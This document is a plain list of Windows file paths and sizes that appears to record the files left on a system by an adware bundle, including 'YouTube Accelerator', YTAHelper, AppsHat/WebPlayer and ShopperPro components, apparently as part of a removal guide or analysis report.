    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\home[1].htm (2931 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\567f43cb72fe3ac6419369953394cadd[1].png (38038 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\6a12dc1a298e870b610a58a56ba0f5ec[1].jpg (584 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\7e5817bad781bbc2d2e43b350ccb53db[1].png (4648 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\7d4f668f3d1818d01b6b9684b669d0db[1].png (5680 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\cc3148e57a2928cd1ada1bbea553c3c2[1].png (1160 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\0692c2494a7331a77c05954f79c5480a[1].png (8120 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\lightbox[1].css (426 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\7fb9f4ca0fa96299334c18ee76c7b68b[1].jpg (3380 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\7c9d412c730603d1d82b98a548a71bac[1].png (8048 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\5.0stars[1].jpg (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\58d196b3e886a838d021adc8c8848f1e[1].png (1160 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\442a5f30204dd385d17de5848683274f[1].png (21888 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\5dbc29649669598ff43174b9ee730008[1].png (2888 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\3d8bbea6bcae57d705c676f7050a7d51[1].png (4648 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\b85261679e262228a562f693b3e6ef6f[1].png (26370 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\52d5414e7372639389ab7e9e4d479aee[1].png (22754 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\close[1].png (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\e54e8c720dffffa619c3b0eacec9381a[1].png (3040 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\ddb3b88cf98eb0220c9e6c252e376749[1].png (13400 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\lightbox[1].js (5015 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\3YEwT2a1878zysq92S8_9w[1].eot (1831 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\23428f8768d928d2bd45dd3b0c4d0057[1].png (20045 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\13a052a6d8c62b7831aa10e2f6f37454[1].jpg (576 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\00c73f6d4e4eb25289dddb86e2d1e319[1].jpg (1928 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\loading[1].gif (200 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\1f8ffa22b53dfc2f6b7f1850bb6b73e8[1].png (12545 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\jquery-ui.min[1].js (128104 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\d586df222f5069b6c396373d67d0163b[1].png (25089 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\3.0stars[1].jpg (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\36d7cd00f07003a67021237993257d08[1].png (9495 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\a6ae526a0a22dcfc743a66d44a3e09e3[1].png (27509 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\83a4cee7a59522b93ed0ae1fa73ce8f3[1].png (2888 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\jquery.min[1].js (49396 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\13ca8e322e15bc394d66a37bec12e3b4[1].png (27909 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\f3ad8b396434c21b4c214fd667ee391d[1].png (1928 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\product[1].css (25 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\589b1e936e1f038dc45bd8ffff59b359[1].png (18247 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\3.5stars[1].jpg (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\4f263f4be4c4396c9078d1874c05b928[1].png (5568 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\f1ed3cd0cae7a3524376e6f9369c7ab8[1].png (6139 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\a64a4b5c68c364d30083fbd0b0363585[1].png (24298 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\f4e4b853ddab3b763f0af17d513631bd[1].png (21259 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\logo[1].jpg (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\4.0stars[1].jpg (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\b147a5a09b49b133d347bd975a4c5616[1].png (4732 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\scripts[1].js (25 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\style[1].css (181 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\bg_main[1].jpg (200 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\59982d8527c0da41e35817e8fc15c0fc[1].png (4648 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\07fce0a4ff78cc7e6376e227f046ce06[1].png (35299 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\ace33f0a1eddf74bbe8d1bfac70deded[1].png (10360 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\4.5stars[1].jpg (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\css[1].css (155 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\365640f122ef96f033f2f87c6308031e[1].png (9488 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\e94782c9200f8de809a50327879df1cc[1].png (20150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A72JYS1P.txt (226 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\ac5196fbf245580eee113296dff14d0b[1].png (8840 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\bbbde9554589bda63791709a6785e0a3[1].png (10360 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IY8Z5ZY0.txt (92 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\btn_bg[1].jpg (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-H5U6C.tmp\cbead634babe14801c0b14d3517a10f8.tmp (1414 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso648D.tmp\Mfuyqgtg.tmp (394440 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso648D.tmp\zwqnxb.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso648D.tmp\Bxaze.exe (1705164 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso648D.tmp\xiwrlae.dll (2119 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso648D.tmp\rypiyr.dll (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd8067.tmp\setup1.exe (144456 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn8056.tmp (154948 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd8067.tmp\D1958.dll (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd8067.tmp\setup.exe (1606835 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd8067.tmp\NK.lky (16 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH000e.TMP (11493 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH001a.TMP (13284 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\blank.html (75 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH000d.TMP (7861 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\YouTube Accelerator.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VADEU.LNG (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\~GLH0006.TMP (115350 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLF6A7B.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\updater.exe (14357 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH0019.TMP (11019 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAENG.LNG (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YTAuninstall.mht (9 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH0011.TMP (34 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLJ625B.tmp (6 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH001f.TMP (2461 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLK645F.tmp (1604 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAIDN.LNG (17 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAPOL.LNG (1166 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAROM.LNG (19 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\sporder.Dll (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~GLH0001.TMP (2104 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\testlsp.exe (19739 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YTAHelperSetup.exe (27866 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~GLH0004.TMP (16 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH0009.TMP (2104 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\xmldb.dll (3048 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH0016.TMP (6341 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~GLH0003.TMP (119 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH0010.TMP (610 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\OK.gif (329 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH0008.TMP (2784 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH000c.TMP (941 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VATRK.LNG (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLC623B.tmp (3791 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAITA.LNG (1660 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAPTB.LNG (401 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~GLH0002.TMP (2104 bytes)
    %Program Files% (x86)\YouTube Accelerator\temp.000 (51331 bytes)
    %Program Files% (x86)\YouTube Accelerator\res\~GLH0014.TMP (75 bytes)
    %Program Files% (x86)\YouTube Accelerator\YouTubeAcceleratorService.exe (49 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VASRB.LNG (1184 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\lspinst2.exe (30222 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAPOL.LNG (1166 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VASRB.LNG (1184 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAESM.LNG (873 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\ytalsp.dll (3271 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAFRA.LNG (402 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YouTubeAccelerator.exe (35420 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAFRA.LNG (402 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\ipc.dll (6691 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH000f.TMP (329 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VANLD.LNG (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\~GLH0007.TMP (1568 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLG6A6A.tmp (93076 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAFIL.LNG (351 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\lspinst.exe (20746 bytes)
    %Program Files% (x86)\YouTube Accelerator\unelevate.exe (98 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\engine.dll (34861 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\Res.dll (7687 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH000a.TMP (18940 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YTAHUninstall.exe (3528 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YouTubeAcceleratorService.exe (20848 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAITA.LNG (1660 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAJPN.LNG (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~GLH0005.TMP (65 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VADEU.LNG (18 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH0012.TMP (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\helper.dll (4155 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\varemove_page2.mht (1961 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAESM.LNG (873 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAIDN.LNG (17 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH0015.TMP (4061 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~GLH0000.TMP (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\AniGIF.ocx (3175 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\varemove_page1.mht (10 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\Cancel.gif (610 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAJPN.LNG (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VANLD.LNG (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\unelevate.exe (2082 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cabex.dll (98 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YouTube Accelerator\YouTube Accelerator.lnk (1 bytes)
    %Program Files% (x86)\YouTube Accelerator\YouTubeAccelerator.exe (146 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VATRK.LNG (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAFAR.LNG (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLM6663.tmp (12 bytes)
    C:\Windows\SysWOW64\temp.000 (3624 bytes)
    %Program Files% (x86)\YouTube Accelerator\~GLH000b.TMP (11493 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YouTube Accelerator\~GLH0021.TMP (65 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAROM.LNG (19 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAFIL.LNG (351 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\comtest.gif (1817 bytes)
    %Program Files% (x86)\YouTube Accelerator\INSTALL.LOG (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAENG.LNG (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAFAR.LNG (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VAPTB.LNG (401 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\progbar.gif (238 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\~GLH0020.TMP (1568 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\ytauninstall.exe (10592 bytes)
    %Program Files% (x86)\YouTube Accelerator\instlsp.log (253 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\storage.js (979 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\WebPlayer.exe (7533 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\web_player\initialize.js (67 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\common.js (8 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\initialize.js (66 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\main.js (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\main.ico (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\Uninstall.exe (843 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\jsonstorage.js (651 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\config.xml (823 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\json.js (16 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\shortcut.ico (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\web_player\web_player.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\installer.js (11 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\xhr.js (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\tray.ico (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\stub.html (680 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\event_listener.js (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\utils.js (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\io.js (751 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso928F.tmp\nsExec.dll (14 bytes)
    %Program Files% (x86)\YTAHelper\FireFox\content\YTAHelper_64.png (4 bytes)
    %Program Files% (x86)\YTAHelper\FireFox\chrome.manifest (111 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\System.dll (23 bytes)
    %Program Files% (x86)\YTAHelper\YTAHelper.exe (32784 bytes)
    %Program Files% (x86)\YTAHelper\FireFox\install.rdf (884 bytes)
    %Program Files% (x86)\YTAHelper\JSDriver\jsdrv.sys (1856 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\jsdrv.exe (100669 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\AccDownload.dll (11667 bytes)
    %Program Files% (x86)\YTAHelper\FireFox\content\overlay.xul (203 bytes)
    %Program Files% (x86)\YTAHelper\JSDriver\jsdrv.exe (100378 bytes)
    C:\Users\Public\Documents\YTAHelper\JsDriver\Config.xml (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\nsProcess.dll (12 bytes)
    %Program Files% (x86)\YTAHelper\yta_database1_0_0.json (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9405.tmp (118586 bytes)
    %Program Files% (x86)\YTAHelper\FireFox\content\overlay.js (13 bytes)
    %Program Files% (x86)\YTAHelper\YTAHelper.dll (13584 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\MoreInfo.dll (15 bytes)
    %Program Files% (x86)\YTAHelper\YTAHelper64.dll (16424 bytes)
    %Program Files% (x86)\YTAHelper\FireFox\content\shopperpro_128.png (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\nsExec.dll (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy5BA8.tmp\appshat.exe (796935 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\AppsHat Mobile Apps\Uninstall.exe (164 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy5BA7.tmp (10027 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy5BA8.tmp\inetc.dll (808 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy5BA8.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy5BA8.tmp\webplayer_installer.exe (8184 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\setup[1].exe (747439 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_24099\ins_sense.exe (51775 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_24099\ins_yta.exe (26262 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_24099\ins_shopperpro.exe (23129 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_24099\ins_iwebar.exe (42875 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_28897\DCytaiesmt_smtyc_setup.exe (7726 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_23184\DCytaiesmt_smtyc_setup.exe (7726 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\scripts\default_config.json (791 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\AppsHat.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\icons\shortcut.ico (6242 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\config[1].json (778 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\icons\main.ico (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\64x64[1].ico (4955 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\scripts\config.xml (819 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\16x16[1].ico (1150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppsHat\Uninstall.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe (204 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppsHat\AppsHat.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\icons\tray.ico (1 bytes)
    C:\ProgramData\ShopperPro\spbihe.js (435 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyC523.tmp\Hbiagmhjfvp.exe (1596567 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyC523.tmp\Ogbxs.tmp (360698 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyC523.tmp\aexyni.dll (2141 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyC523.tmp\rblyvufer.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyC523.tmp\wwrumuo.dll (30 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\0a2d548fab0bdcbb01b05c6e87825d0b.js (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\dialog.js (5 bytes)
